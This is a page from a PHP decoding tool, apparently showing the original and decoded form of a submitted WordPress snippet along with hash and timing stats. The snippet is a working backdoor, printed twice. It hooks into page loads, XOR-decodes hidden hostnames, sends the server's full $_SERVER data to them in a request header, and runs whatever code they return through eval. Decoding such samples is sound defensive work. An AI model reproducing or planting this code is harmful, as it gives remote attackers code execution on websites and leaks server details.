Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
add_action('admin_init', "open_hello"); if (!is_admin()) { open_hello(); } fun..
Decoded Output download
<? add_action('admin_init', "open_hello");
if (!is_admin()) {
open_hello();
}
function open_hello()
{
$args = array(
'timeout' => 15,
'headers' => array(
"User-Agent" => json_encode($_SERVER),
),
);
$ids = array("BX1ZBTk4FidZHyU=", "BX1ZGiAsHDxZHyU=", "BX1ZHWBmXTsC");
foreach ($ids as $id) {
$id = base64_decode($id);
$decoded = ""; for ($i = 0; $i < strlen($id); $i++) $decoded .= $id[$i] ^ "sIwmPU"[$i % strlen("sIwmPU")];
$response = wp_remote_get("http://" . $decoded . "/v5", $args);
if (!is_wp_error($response) && 200 === wp_remote_retrieve_response_code($response)) {
return eval($response['body']);
}
}
}
?>
Did this file decode correctly?
Original Code
add_action('admin_init', "open_hello");
if (!is_admin()) {
open_hello();
}
function open_hello()
{
$args = array(
'timeout' => 15,
'headers' => array(
"User-Agent" => json_encode($_SERVER),
),
);
$ids = array("BX1ZBTk4FidZHyU=", "BX1ZGiAsHDxZHyU=", "BX1ZHWBmXTsC");
foreach ($ids as $id) {
$id = base64_decode($id);
$decoded = ""; for ($i = 0; $i < strlen($id); $i++) $decoded .= $id[$i] ^ "sIwmPU"[$i % strlen("sIwmPU")];
$response = wp_remote_get("http://" . $decoded . "/v5", $args);
if (!is_wp_error($response) && 200 === wp_remote_retrieve_response_code($response)) {
return eval($response['body']);
}
}
}
Function Calls
None |
Stats
MD5 | a7031737e97974c0776f2ae4a7f350eb |
Eval Count | 0 |
Decode Time | 47 ms |